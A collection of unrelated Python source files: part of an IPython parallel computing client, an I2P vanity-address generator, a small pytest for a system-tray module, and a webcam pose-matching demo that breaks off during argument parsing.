targets = []
for t in targets:
self.session.send(self._control_socket, 'shutdown_request',
content={'restart':restart},ident=t)
error = False
if block or hub:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket, 0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if hub:
time.sleep(0.25)
self.session.send(self._query_socket, 'shutdown_request')
idents,msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
if error:
raise error
#--------------------------------------------------------------------------
# Execution related methods
#--------------------------------------------------------------------------
def _maybe_raise(self, result):
"""wrapper for maybe raising an exception if apply failed."""
if isinstance(result, error.RemoteError):
raise result
return result
def send_apply_request(self, socket, f, args=None, kwargs=None, metadata=None, track=False,
ident=None):
"""construct and send an apply message via a socket.
This is the principal method with which all engine execution is performed by views.
"""
if self._closed:
raise RuntimeError("Client cannot be used after its sockets have been closed")
# defaults:
args = args if args is not None else []
kwargs = kwargs if kwargs is not None else {}
metadata = metadata if metadata is not None else {}
# validate arguments
if not callable(f) and not isinstance(f, Reference):
raise TypeError("f must be callable, not %s"%type(f))
if not isinstance(args, (tuple, list)):
raise TypeError("args must be tuple or list, not %s"%type(args))
if not isinstance(kwargs, dict):
raise TypeError("kwargs must be dict, not %s"%type(kwargs))
if not isinstance(metadata, dict):
raise TypeError("metadata must be dict, not %s"%type(metadata))
bufs = serialize.pack_apply_message(f, args, kwargs,
buffer_threshold=self.session.buffer_threshold,
item_threshold=self.session.item_threshold,
)
msg = self.session.send(socket, "apply_request", buffers=bufs, ident=ident,
metadata=metadata, track=track)
msg_id = msg['header']['msg_id']
self.outstanding.add(msg_id)
if ident:
# possibly routed to a specific engine
if isinstance(ident, list):
ident = ident[-1]
if ident in self._engines.values():
# save for later, in case of engine death
self._outstanding_dict[ident].add(msg_id)
self.history.append(msg_id)
self.metadata[msg_id]['submitted'] = datetime.now()
return msg
def send_execute_request(self, socket, code, silent=True, metadata=None, ident=None):
"""construct and send an execute request via a socket.
"""
if self._closed:
raise RuntimeError("Client cannot be used after its sockets have been closed")
# defaults:
metadata = metadata if metadata is not None else {}
# validate arguments
if not isinstance(code, basestring):
raise TypeError("code must be text, not %s" % type(code))
if not isinstance(metadata, dict):
raise TypeError("metadata must be dict, not %s" % type(metadata))
content = dict(code=code, silent=bool(silent), user_variables=[], user_expressions={})
msg = self.session.send(socket, "execute_request", content=content, ident=ident,
metadata=metadata)
msg_id = msg['header']['msg_id']
self.outstanding.add(msg_id)
if ident:
# possibly routed to a specific engine
if isinstance(ident, list):
ident = ident[-1]
if ident in self._engines.values():
# save for later, in case of engine death
self._outstanding_dict[ident].add(msg_id)
self.history.append(msg_id)
self.metadata[msg_id]['submitted'] = datetime.now()
return msg
#--------------------------------------------------------------------------
# construct a View object
#--------------------------------------------------------------------------
def load_balanced_view(self, targets=None):
"""construct a DirectView object.
If no arguments are specified, create a LoadBalancedView
using all engines.
Parameters
----------
targets: list,slice,int,etc. [default: use all engines]
The subset of engines across which to load-balance
"""
if targets == 'all':
targets = None
if targets is not None:
targets = self._build_targets(targets)[1]
return LoadBalancedView(client=self, socket=self._task_socket, targets=targets)
def direct_view(self, targets='all'):
"""construct a DirectView object.
If no targets are specified, create a DirectView using all engines.
rc.direct_view('all') is distinguished from rc[:] in that 'all' will
evaluate the target engines at each execution, whereas rc[:] will connect to
all *current* engines, and that list will not change.
That is, 'all' will always use all engines, whereas rc[:] will not use
engines added after the DirectView is constructed.
Parameters
----------
targets: list,slice,int,etc. [default: use all engines]
The engines to use for the View
"""
single = isinstance(targets, int)
# allow 'all' to be lazily evaluated at each execution
if targets != 'all':
targets = self._build_targets(targets)[1]
if single:
targets = targets[0]
return DirectView(client=self, socket=self._mux_socket, targets=targets)
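# Illustrative usage sketch (not part of the original source). `rc` is assumed to
# be a connected Client; note the difference between the lazily evaluated 'all'
# view and the snapshot taken by rc[:], as explained in the docstring above.
def _example_views(rc):
    dview = rc.direct_view('all')    # always targets all engines, even ones added later
    snapshot = rc[:]                 # fixed to the engines registered right now
    lview = rc.load_balanced_view()  # task farming across all engines
    return dview, snapshot, lview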
#--------------------------------------------------------------------------
# Query methods
#--------------------------------------------------------------------------
@spin_first
def get_result(self, indices_or_msg_ids=None, block=None):
"""Retrieve a result by msg_id or history index, wrapped in an AsyncResult object.
If the client already has the results, no request to the Hub will be made.
This is a convenient way to construct AsyncResult objects, which are wrappers
that include metadata about execution, and allow for awaiting results that
were not submitted by this Client.
It can also be a convenient way to retrieve the metadata associated with
blocking execution, since it always retrieves
Examples
--------
::
In [10]: r = client.apply()
Parameters
----------
indices_or_msg_ids : integer history index, str msg_id, or list of either
The indices or msg_ids of the results to be retrieved
block : bool
Whether to wait for the result to be done
Returns
-------
AsyncResult
A single AsyncResult object will always be returned.
AsyncHubResult
A subclass of AsyncResult that retrieves results from the Hub
"""
block = self.block if block is None else block
if indices_or_msg_ids is None:
indices_or_msg_ids = -1
single_result = False
if not isinstance(indices_or_msg_ids, (list,tuple)):
indices_or_msg_ids = [indices_or_msg_ids]
single_result = True
theids = []
for id in indices_or_msg_ids:
if isinstance(id, int):
id = self.history[id]
if not isinstance(id, basestring):
raise TypeError("indices must be str or int, not %r"%id)
theids.append(id)
local_ids = filter(lambda msg_id: msg_id in self.outstanding or msg_id in self.results, theids)
remote_ids = filter(lambda msg_id: msg_id not in local_ids, theids)
# given a single msg_id initially, get_result should get the result itself,
# not a length-one list
if single_result:
theids = theids[0]
if remote_ids:
ar = AsyncHubResult(self, msg_ids=theids)
else:
ar = AsyncResult(self, msg_ids=theids)
if block:
ar.wait()
return ar
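# Usage sketch: retrieving results by history index or msg_id. Assumes `rc` is
# a connected Client and at least one task has already been submitted.
#
#   >>> ar = rc[:].apply_async(pow, 2, 10)
#   >>> ar.get()
#   >>> rc.get_result(-1)            # most recent submission, by history index
#   >>> rc.get_result(ar.msg_ids)    # the same tasks, by msg_id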
@spin_first
def resubmit(self, indices_or_msg_ids=None, metadata=None, block=None):
"""Resubmit one or more tasks.
In-flight tasks may not be resubmitted.
Parameters
----------
indices_or_msg_ids : integer history index, str msg_id, or list of either
The indices or msg_ids of the results to be resubmitted
block : bool
Whether to wait for the result to be done
Returns
-------
AsyncHubResult
A subclass of AsyncResult that retrieves results from the Hub
"""
block = self.block if block is None else block
if indices_or_msg_ids is None:
indices_or_msg_ids = -1
if not isinstance(indices_or_msg_ids, (list,tuple)):
indices_or_msg_ids = [indices_or_msg_ids]
theids = []
for id in indices_or_msg_ids:
if isinstance(id, int):
id = self.history[id]
if not isinstance(id, basestring):
raise TypeError("indices must be str or int, not %r"%id)
theids.append(id)
content = dict(msg_ids = theids)
self.session.send(self._query_socket, 'resubmit_request', content)
zmq.select([self._query_socket], [], [])
idents,msg = self.session.recv(self._query_socket, zmq.NOBLOCK)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
mapping = content['resubmitted']
new_ids = [ mapping[msg_id] for msg_id in theids ]
ar = AsyncHubResult(self, msg_ids=new_ids)
if block:
ar.wait()
return ar
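# Usage sketch: rerunning the most recent task. Assumes it is no longer in flight.
#
#   >>> ar = rc.resubmit(-1, block=True)
#   >>> ar.get()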
@spin_first
def result_status(self, msg_ids, status_only=True):
"""Check on the status of the result(s) of the apply request with `msg_ids`.
If status_only is False, then the actual results will be retrieved, else
only the status of the results will be checked.
Parameters
----------
msg_ids : list of msg_ids
if int:
Passed as index to self.history for convenience.
status_only : bool (default: True)
if False:
Retrieve the actual results of completed tasks.
Returns
-------
results : dict
There will always be the keys 'pending' and 'completed', which will
be lists of msg_ids that are incomplete or complete. If `status_only`
is False, then completed results will be keyed by their `msg_id`.
"""
if not isinstance(msg_ids, (list,tuple)):
msg_ids = [msg_ids]
theids = []
for msg_id in msg_ids:
if isinstance(msg_id, int):
msg_id = self.history[msg_id]
if not isinstance(msg_id, basestring):
raise TypeError("msg_ids must be str, not %r"%msg_id)
theids.append(msg_id)
completed = []
local_results = {}
# comment this block out to temporarily disable local shortcut:
for msg_id in list(theids):  # iterate over a copy; theids is modified inside the loop
if msg_id in self.results:
completed.append(msg_id)
local_results[msg_id] = self.results[msg_id]
theids.remove(msg_id)
if theids: # some not locally cached
content = dict(msg_ids=theids, status_only=status_only)
msg = self.session.send(self._query_socket, "result_request", content=content)
zmq.select([self._query_socket], [], [])
idents,msg = self.session.recv(self._query_socket, zmq.NOBLOCK)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
buffers = msg['buffers']
else:
content = dict(completed=[],pending=[])
content['completed'].extend(completed)
if status_only:
return content
failures = []
# load cached results into result:
content.update(local_results)
# update cache with results:
for msg_id in sorted(theids):
if msg_id in content['completed']:
rec = content[msg_id]
parent = rec['header']
header = rec['result_header']
rcontent = rec['result_content']
iodict = rec['io']
if isinstance(rcontent, str):
rcontent = self.session.unpack(rcontent)
md = self.metadata[msg_id]
md_msg = dict(
content=rcontent,
parent_header=parent,
header=header,
metadata=rec['result_metadata'],
)
md.update(self._extract_metadata(md_msg))
if rec.get('received'):
md['received'] = rec['received']
md.update(iodict)
if rcontent['status'] == 'ok':
if header['msg_type'] == 'apply_reply':
res,buffers = serialize.unserialize_object(buffers)
elif header['msg_type'] == 'execute_reply':
res = ExecuteReply(msg_id, rcontent, md)
else:
raise KeyError("unhandled msg type: %r" % header['msg_type'])
else:
res = self._unwrap_exception(rcontent)
failures.append(res)
self.results[msg_id] = res
content[msg_id] = res
if len(theids) == 1 and failures:
raise failures[0]
error.collect_exceptions(failures, "result_status")
return content
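# Usage sketch: checking completion without fetching the results themselves
# (with `ar` an AsyncResult from an earlier submission).
#
#   >>> status = rc.result_status(ar.msg_ids, status_only=True)
#   >>> status['pending'], status['completed']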
@spin_first
def queue_status(self, targets='all', verbose=False):
"""Fetch the status of engine queues.
Parameters
----------
targets : int/str/list of ints/strs
the engines whose states are to be queried.
default : all
verbose : bool
Whether to return lengths only, or lists of ids for each element
"""
if targets == 'all':
# allow 'all' to be evaluated on the engine
engine_ids = None
else:
engine_ids = self._build_targets(targets)[1]
content = dict(targets=engine_ids, verbose=verbose)
self.session.send(self._query_socket, "queue_request", content=content)
idents,msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
status = content.pop('status')
if status != 'ok':
raise self._unwrap_exception(content)
content = rekey(content)
if isinstance(targets, int):
return content[targets]
else:
return content
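# Usage sketch: inspecting engine queues.
#
#   >>> rc.queue_status()                 # per-engine queue info, keyed by engine id
#   >>> rc.queue_status(0, verbose=True)  # msg_id lists for a single engine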
def _build_msgids_from_target(self, targets=None):
"""Build a list of msg_ids from the list of engine targets"""
if not targets: # needed as _build_targets otherwise uses all engines
return []
target_ids = self._build_targets(targets)[0]
return filter(lambda md_id: self.metadata[md_id]["engine_uuid"] in target_ids, self.metadata)
def _build_msgids_from_jobs(self, jobs=None):
"""Build a list of msg_ids from "jobs" """
if not jobs:
return []
msg_ids = []
if isinstance(jobs, (basestring,AsyncResult)):
jobs = [jobs]
bad_ids = filter(lambda obj: not isinstance(obj, (basestring, AsyncResult)), jobs)
if bad_ids:
raise TypeError("Invalid msg_id type %r, expected str or AsyncResult"%bad_ids[0])
for j in jobs:
if isinstance(j, AsyncResult):
msg_ids.extend(j.msg_ids)
else:
msg_ids.append(j)
return msg_ids
def purge_local_results(self, jobs=[], targets=[]):
"""Clears the client caches of results and their metadata.
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_local_results('all')` to scrub everything from the Client's
results and metadata caches.
After this call all `AsyncResults` are invalid and should be discarded.
If you must "reget" the results, you can still do so by using
`client.get_result(msg_id)` or `client.get_result(asyncresult)`. This will
redownload the results from the hub if they are still available
(i.e. `client.purge_hub_results(...)` has not been called).
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be purged.
targets : int/list of ints
The engines, by integer ID, whose entire result histories are to be purged.
Raises
------
RuntimeError : if any of the tasks to be purged are still outstanding.
"""
if not targets and not jobs:
raise ValueError("Must specify at least one of `targets` and `jobs`")
if jobs == 'all':
if self.outstanding:
raise RuntimeError("Can't purge outstanding tasks: %s" % self.outstanding)
self.results.clear()
self.metadata.clear()
else:
msg_ids = set()
msg_ids.update(self._build_msgids_from_target(targets))
msg_ids.update(self._build_msgids_from_jobs(jobs))
still_outstanding = self.outstanding.intersection(msg_ids)
if still_outstanding:
raise RuntimeError("Can't purge outstanding tasks: %s" % still_outstanding)
map(self.results.pop, msg_ids)
map(self.metadata.pop, msg_ids)
@spin_first
def purge_hub_results(self, jobs=[], targets=[]):
"""Tell the Hub to forget results.
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_results('all')` to scrub everything from the Hub's db.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be forgotten.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire history is to be purged.
default : None
"""
if not targets and not jobs:
raise ValueError("Must specify at least one of `targets` and `jobs`")
if targets:
targets = self._build_targets(targets)[1]
# construct msg_ids from jobs
if jobs == 'all':
msg_ids = jobs
else:
msg_ids = self._build_msgids_from_jobs(jobs)
content = dict(engine_ids=targets, msg_ids=msg_ids)
self.session.send(self._query_socket, "purge_request", content=content)
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
def purge_results(self, jobs=[], targets=[]):
"""Clears the cached results from both the hub and the local client
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_results('all')` to scrub every cached result from both the Hub's and
the Client's db.
Equivalent to calling both `purge_hub_results()` and `purge_local_results()` with
the same arguments.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be forgotten.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire history is to be purged.
default : None
"""
self.purge_local_results(jobs=jobs, targets=targets)
self.purge_hub_results(jobs=jobs, targets=targets)
def purge_everything(self):
"""Clears all content from previous Tasks from both the hub and the local client
In addition to calling `purge_results("all")` it also deletes the history and
other bookkeeping lists.
"""
self.purge_results("all")
self.history = []
self.session.digest_history.clear()
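# Usage sketch: the purge family, from narrowest to broadest (with `ar` an
# AsyncResult from an earlier submission).
#
#   >>> rc.purge_local_results(ar)         # drop these results from the local cache
#   >>> rc.purge_hub_results('all')        # scrub the Hub's database
#   >>> rc.purge_results(targets=[0, 1])   # both caches, for two engines
#   >>> rc.purge_everything()              # results, metadata and history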
@spin_first
def hub_history(self):
"""Get the Hub's history
Just like the Client, the Hub has a history, which is a list of msg_ids.
This will contain the history of all clients, and, depending on configuration,
may contain history across multiple cluster sessions.
Any msg_id returned here is a valid argument to `get_result`.
Returns
-------
msg_ids : list of strs
list of all msg_ids, ordered by task submission time.
"""
self.session.send(self._query_socket, "history_request", content={})
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
else:
return content['history']
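# Usage sketch: pulling an old result back via the Hub-wide history.
#
#   >>> msg_ids = rc.hub_history()
#   >>> oldest = rc.get_result(msg_ids[0])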
@spin_first
def db_query(self, query, keys=None):
"""Query the Hub's TaskRecord database
This will return a list of task record dicts that match `query`
Parameters
----------
query : mongodb query dict
The search dict. See mongodb query docs for details.
keys : list of strs [optional]
The subset of keys to be returned. The default is to fetch everything but buffers.
'msg_id' will *always* be included.
"""
if isinstance(keys, basestring):
keys = [keys]
content = dict(query=query, keys=keys)
self.session.send(self._query_socket, "db_request", content=content)
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
records = content['records']
buffer_lens = content['buffer_lens']
result_buffer_lens = content['result_buffer_lens']
buffers = msg['buffers']
has_bufs = buffer_lens is not None
has_rbufs = result_buffer_lens is not None
for i,rec in enumerate(records):
# relink buffers
if has_bufs:
blen = buffer_lens[i]
rec['buffers'], buffers = buffers[:blen],buffers[blen:]
if has_rbufs:
blen = result_buffer_lens[i]
rec['result_buffers'], buffers = buffers[:blen],buffers[blen:]
return records
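# Usage sketch: a MongoDB-style query against the Hub's task database (with `ar`
# an AsyncResult from an earlier submission). Key names besides 'msg_id' are
# illustrative TaskRecord fields.
#
#   >>> recs = rc.db_query({'msg_id': {'$in': ar.msg_ids}},
#   ...                    keys=['msg_id', 'completed', 'engine_uuid'])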
__all__ = [ 'Client' ]
|
i2pvain.py
|
#!/usr/bin/env python3
import sys
import os
import struct
import socket
import re
from hashlib import sha256
from base64 import b32encode, b64decode, b64encode
from multiprocessing import Process, Queue
def get_sam_address():
value = os.getenv("I2P_SAM_ADDRESS")
if value:
value = value.split(":")
return (value[0], int(value[1]))
else:
return ("127.0.0.1", 7656)
def vain(data, prefix, q):
cert_len = struct.unpack("!H", data[385:387])[0]
public_data = data[:387+cert_len]
data_tail = data[387+cert_len:]
head = public_data[:256] + os.urandom(88)
tail = public_data[352:]
head_hash = sha256(head)
while True:
padding = os.urandom(8)
new_hash = head_hash.copy()
new_hash.update(padding + tail)
if b32encode(new_hash.digest()).startswith(prefix):
new_data = head + padding + tail
address = b32encode(new_hash.digest()).decode()[:52].lower()
break
q.put({"address": address, "data": new_data+data_tail})
def get_new_destination(sam_address):
sam_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sam_socket.connect(sam_address)
except ConnectionRefusedError:
print("SAM API is unavailable. Make sure SAM is enabled on your I2P router.")
exit()
sam_socket.send(b"HELLO VERSION MIN=3.1 MAX=3.1\n")
reply = sam_socket.recv(4096)
if reply == b"HELLO REPLY RESULT=OK VERSION=3.1\n":
sam_socket.send(b"DEST GENERATE SIGNATURE_TYPE=7\n")
reply = sam_socket.recv(4096)
dest = reply.split(b" ")[3][5:-1]
sam_socket.close()
return b64decode(dest, altchars="-~", validate=True)
else:
print(reply)
exit()
def generate_address(prefix):
prefix = prefix.upper().encode()
data = get_new_destination(get_sam_address())
processes = []
q = Queue()
for x in range(os.cpu_count()):
p = Process(target=vain, args=(data, prefix, q))
p.start()
processes.append(p)
new_key = q.get()
for x in processes: x.terminate()
return new_key
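# Usage sketch: generate_address() returns a dict with the lower-case .b32
# address and the raw destination bytes, exactly as consumed by main() below.
# Requires a local I2P router with the SAM API enabled.
#
#   >>> key = generate_address("ab")
#   >>> key["address"]        # 52-character base32 string starting with "ab"
#   >>> key["data"]           # full destination keys, ready to write to disk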
def main():
if len(sys.argv) < 2:
print("Usage: {} PREFIX [FILE]".format(sys.argv[0]))
return
prefix = sys.argv[1]
if not re.match("^[a-zA-Z0-9]+$", prefix):
print("Prefix must be alphanumeric string")
return
if len(sys.argv) == 3:
outfile = sys.argv[2]
else:
outfile = "key.dat"
new_key = generate_address(prefix)
print(new_key["address"] + ".b32.i2p")
print(b64encode(new_key["data"], altchars=b"-~").decode())
if os.access(os.path.dirname(outfile) or ".", os.W_OK):
with open(outfile, 'wb') as f:
f.write(new_key["data"])
print("Key saved to -->", outfile)
if __name__ == "__main__":
main()
|
test_stray.py
|
# -*- coding: utf-8 -*-
"""
.. module:: test_stray
:platform: Unix
:synopsis: tests for the stray submodule.
.. moduleauthor:: Mehmet Mert Yıldıran <mert.yildiran@bil.omu.edu.tr>
"""
from multiprocessing import Process, Event
import time
from ava.stray import SystemTrayExitListenerSet, SystemTrayInit
import pytest
def test_stray():
e = Event()
SystemTrayExitListenerSet(e)
stray_proc = Process(target=SystemTrayInit)
stray_proc.start()
time.sleep(3)
stray_proc.terminate()
assert True
|
live_demo.py
|
"""Live demo of target pose matching."""
import utils
import inference
import cv2
import numpy as np
import seaborn as sns
import yaml
from time import sleep
from time import perf_counter as time
from threading import Thread
from collections import deque
from typing import Optional, Tuple
import argparse
import os
class TargetPoses:
def __init__(
self,
target_poses_path: str,
max_height: int,
initial_target: Optional[int] = 0,
border_width: int = 4,
border_color: Tuple[int, int, int] = (255, 255, 255),
selected_width: int = 12,
selected_color: Tuple[int, int, int] = (0, 200, 0),
completed_alpha: float = 0.7,
):
self.target_poses_path = target_poses_path
self.target_ind = initial_target
self.max_height = max_height
self.border_width = border_width
self.border_color = border_color
self.selected_width = selected_width
self.selected_color = selected_color
self.completed_alpha = completed_alpha
# Load data
with open(self.target_poses_path, "r") as f:
self.targets = yaml.load(f, yaml.Loader)
for i in range(len(self.targets)):
# Convert poses to numpy array.
self.targets[i]["pose"] = np.array(self.targets[i]["pose"])
self.targets[i]["norm_pose"] = np.array(self.targets[i]["norm_pose"])
# Initialize completeness flag
self.targets[i]["complete"] = False
# Preload and preprocess viz images.
self.img_height = self.max_height // len(self.targets)
for i, target in enumerate(self.targets):
img = cv2.imread(target["viz_path"])
scale = self.img_height / img.shape[0]
img = cv2.resize(img, None, fx=scale, fy=scale)
img = utils.add_border(img, self.border_width, self.border_color)
self.targets[i]["img"] = img
assert (
sum([target["img"].shape[0] for target in self.targets]) == self.max_height
)
def __len__(self) -> int:
return len(self.targets)
def next_target(self):
self.target_ind = (self.target_ind + 1) % len(self)
@property
def current_target(self):
return self.targets[self.target_ind]
@property
def width(self) -> int:
return self.targets[0]["img"].shape[1]
def reset_completeness(self):
for i in range(len(self)):
self.targets[i]["complete"] = False
def complete_current(self):
self.targets[self.target_ind]["complete"] = True
def render(self) -> np.ndarray:
rendered = []
for i, target in enumerate(self.targets):
img = target["img"].copy()
if self.target_ind is not None and i == self.target_ind:
img = utils.add_border(img, self.selected_width, self.selected_color)
elif target["complete"]:
img = cv2.addWeighted(
img,
self.completed_alpha,
np.full(img.shape, 255, dtype=img.dtype),
1 - self.completed_alpha,
0,
)
rendered.append(img)
rendered = np.concatenate(rendered, axis=0)
return rendered
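# Sketch of the per-pose entry expected in the target-poses YAML file, inferred
# from the keys read above and in LiveDemo ('pose', 'norm_pose', 'viz_path',
# 'ref1', 'ref2'). Values below are placeholders, not real data.
#
#   - viz_path: "data/pose_01.png"
#     pose: [[310, 120], [355, 118], ...]   # absolute keypoint coordinates
#     norm_pose: [[-0.4, 0.1], ...]         # keypoints normalized by the reference pair
#     ref1: 5                               # indices of the two reference keypoints
#     ref2: 6                               # used for scale/origin normalization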
class LiveDemo:
def __init__(
self,
camera: int = 0,
camera_width: int = 1920,
camera_height: int = 1080,
camera_brightness: int = 128,
fps: float = 30,
horizontal_mirror: bool = True,
render_scale: float = 1.0,
node_cmap: str = "tab20",
node_radius: int = 8,
node_thickness: int = 6,
arrow_thickness: int = 5,
max_arrow_length: int = 150,
target_thickness: int = 5,
rel_target_radius: float = 0.4,
blend_alpha: float = 0.6,
model_name: str = "thunder",
center_pad: bool = False,
min_score: float = 0.4,
buffer_size: int = 5,
target_poses_path: str = "data/target_poses.yaml",
):
self.camera = camera
self.camera_width = camera_width
self.camera_height = camera_height
self.camera_brightness = camera_brightness
self.fps = fps
self.horizontal_mirror = horizontal_mirror
self.render_scale = render_scale
self.node_cmap = node_cmap
self.node_radius = node_radius
self.node_thickness = node_thickness
self.arrow_thickness = arrow_thickness
self.max_arrow_length = max_arrow_length
self.target_thickness = target_thickness
self.rel_target_radius = rel_target_radius
self.blend_alpha = blend_alpha
self.model_name = model_name
self.center_pad = center_pad
self.min_score = min_score
self.buffer_size = buffer_size
self.target_poses_path = target_poses_path
# Setup camera.
if os.name == "nt":
self.capture = cv2.VideoCapture(self.camera, cv2.CAP_DSHOW)
print(f"Camera (ID: {self.camera}) using DirectShow (Windows).")
else:
self.capture = cv2.VideoCapture(self.camera)
self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 2)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, self.camera_width)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, self.camera_height)
self.capture.set(cv2.CAP_PROP_BRIGHTNESS, self.camera_brightness)
# Reset properties in case camera doesn't support the specified dimensions.
self.camera_width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
self.camera_height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
print(f"Camera (ID: {self.camera}) resolution: {self.camera_width} x {self.camera_height}")
# Initialize rendering.
cv2.namedWindow("frame", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("frame", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# Load model.
self.model = inference.load_model(model_name)
self.image_size = self.model.input.shape[1]
self.n_nodes = self.model.outputs[0].shape[0]
# Setup colors.
self.node_colors = (
np.array(sns.color_palette(self.node_cmap, self.n_nodes)) * 255
)
# Load target poses.
self.target_poses = TargetPoses(
target_poses_path=self.target_poses_path,
max_height=int(self.camera_height * self.render_scale),
)
# Specify nodes that will be used as targets.
# TODO: Parametrize this?
self.target_nodes = (
"left_shoulder",
"right_shoulder",
"left_elbow",
"right_elbow",
"left_wrist",
"right_wrist",
"left_hip",
"right_hip",
"left_knee",
"right_knee",
"left_ankle",
"right_ankle",
)
# Initialize buffers.
self.frame = None
self.points = None
self.scores = None
self.node_buffers = [
deque(maxlen=self.buffer_size) for _ in range(self.n_nodes)
]
self.smooth_points = np.full((self.n_nodes, 2), np.nan)
# Run the update thread.
self.done = False
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
def update(self):
while not self.done:
dt = 0
if self.capture.isOpened():
t0 = time()
# Fetch webcam image
cap_status, img = self.capture.read()
if self.horizontal_mirror:
# Horizontal mirror
img = img[:, ::-1]
# Crop to horizontal center to account for targets
crop_x0 = int((self.target_poses.width / self.render_scale) // 2)
crop_x1 = self.camera_width - crop_x0
img = img[:, crop_x0:crop_x1]
# Predict
self.points, self.scores = inference.predict(
self.model, img[:, :, ::-1], pad=self.center_pad
)
# Update keypoint buffer
for j, (pt, score) in enumerate(zip(self.points, self.scores)):
if score > self.min_score:
self.node_buffers[j].append(pt)
else:
self.node_buffers[j].append((np.nan, np.nan))
# Compute smoothed version
node_buffer = np.array(self.node_buffers[j]) # (n, 2)
if np.isnan(node_buffer).all():
self.smooth_points[j, :] = np.nan
else:
self.smooth_points[j] = np.nanmean(node_buffer, axis=0)
# Upscale for viz
img = cv2.resize(img, None, fx=self.render_scale, fy=self.render_scale)
# Copy raw for overlaying with alpha blending
img0 = img.copy()
# Draw nodes
for j in range(self.n_nodes):
if not (np.isnan(self.smooth_points[j]).all()):
pt = self.smooth_points[j] * self.render_scale
img = cv2.circle(
img,
(int(pt[0]), int(pt[1])),
radius=int(self.node_radius * self.render_scale),
color=self.node_colors[j][::-1],
thickness=int(self.node_thickness * self.render_scale),
lineType=cv2.LINE_AA,
)
# Target pose
target_pose = self.target_poses.current_target
ref_pts = self.smooth_points[[target_pose["ref1"], target_pose["ref2"]]]
if not (np.isnan(ref_pts).any()):
norm_factor = np.linalg.norm(ref_pts[0] - ref_pts[1])
origin = ref_pts.mean(axis=0)
n_in_target = 0
for node_name in self.target_nodes:
j = utils.KEYPOINT_NODES[node_name]
target_rel_pos = target_pose["norm_pose"][j]
img, in_target = self.render_target(
img,
keypoint=self.smooth_points[j],
target=origin + (norm_factor * target_rel_pos),
node_col=self.node_colors[j],
target_radius=self.rel_target_radius * norm_factor,
)
n_in_target += int(in_target)
if n_in_target == len(self.target_nodes):
# Completed pose! Show visual indicator and move to next pose.
# TODO: Hold for a min number of frames?
# Could store this in the pose_targets and use it to render a
# progress bar.
self.target_poses.complete_current()
self.target_poses.next_target()
# Alpha blend
img = cv2.addWeighted(
img, self.blend_alpha, img0, 1 - self.blend_alpha, 0
)
# Concatenate the rendered targets
img = np.concatenate([img, self.target_poses.render()], axis=1)
img = img[:, : int(self.camera_width * self.render_scale)]
# Save final rendered image
self.frame = img
dt = time() - t0
# Sleep for remainder of duty cycle, if any
sleep(max((1 / self.fps) - dt, 0))
def render_target(
self,
img,
keypoint,
target,
node_col,
target_radius,
):
dist_to_target = np.linalg.norm(target - keypoint)
in_target = dist_to_target < target_radius
if in_target:
target_col = (0, 255, 0)
else:
target_col = (0, 0, 255)
unit_vec = (target - keypoint) / dist_to_target
pt2 = (
unit_vec
* min(self.max_arrow_length * self.render_scale, dist_to_target)
) + keypoint
img = cv2.arrowedLine(
img,
pt1=(keypoint * self.render_scale).astype(int),
pt2=(pt2 * self.render_scale).astype(int),
color=node_col[::-1],
thickness=int(self.arrow_thickness * self.render_scale),
line_type=cv2.LINE_AA,
shift=0,
tipLength=0.1,
)
img = cv2.circle(
img,
(int(target[0] * self.render_scale), int(target[1] * self.render_scale)),
radius=int(min(target_radius, dist_to_target) * self.render_scale),
color=target_col,
thickness=int(self.target_thickness * self.render_scale),
lineType=cv2.LINE_AA,
)
return img, in_target
def show_frame(self):
"""Display rendered frame."""
if self.frame is None:
return
# Update rendered frame.
cv2.imshow("frame", self.frame)
# Wait for duty cycle and listen for key press.
key = cv2.waitKey(int(1000 / self.fps))
if key == 27 or key == 113: # Esc or q
# Quit.
self.done = True
self.thread.join()
elif key >= (1 + 48) and key <= (9 + 48):
# Set target pose
key_num = key - 48 # 1-based
self.target_poses.target_ind = (key_num - 1) % len(self.target_poses)
elif key == 114: # r
# Reset target pose completeness
self.target_poses.reset_completeness()
elif key == 9: # Tab
# Cycle through target poses
self.target_poses.next_target()
elif key > 0:
print("Pressed:", key)
def run(self):
"""Run demo until stopped."""
while not self.done:
self.show_frame()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-c", "--camera", help="Camera index to use.", type=int, default=0
)
parser.add_argument("--cpu", help="Disable GPU inference.", action="store_true")
parser.add_argument(
"-t",
"--target-poses",
help="Path to target poses YAML file.",
default="data/target_poses.yaml",
)
parser.add_argument(
"--tolerance",
